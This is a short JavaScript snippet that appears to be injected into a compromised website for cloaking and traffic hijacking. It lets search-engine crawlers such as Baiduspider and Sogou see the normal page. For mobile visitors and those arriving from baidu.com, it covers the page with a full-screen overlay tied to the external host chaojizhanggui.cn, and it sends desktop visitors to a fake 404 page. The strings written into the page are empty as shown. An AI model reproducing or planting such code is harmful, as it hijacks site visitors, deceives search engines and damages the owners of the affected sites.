document.write ('');
var s=document.referrer;
var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider|Baiduspider-render)/i;
if ( !reg.test(navigator.userAgent) ) {
let flag = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|QQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if ( ! /Win/i.test(navigator.platform) && ! /Mac/i.test(navigator.platform) ) {
//k
//_src = 'http://www.chaojizhanggui.cn/ ';
var _src = Math.random() < 95/100 ? 'http://www.chaojizhanggui.cn/' : 'http://www.chaojizhanggui.cn/';
} else if (s.indexOf("baidu.com") > -1 )
{ _src = 'http://www.chaojizhanggui.cn/';
}
else {
// PC
_src = '/fn404.htm';
}
document.write('');
var hd = document.head;
var styleCSS = document.createElement('style'), yabo = document.createElement('div');
styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}';
yabo.setAttribute('class', 'yabo');
yabo.innerHTML = '';
hd.appendChild(styleCSS);
hd.parentNode.appendChild(yabo);
}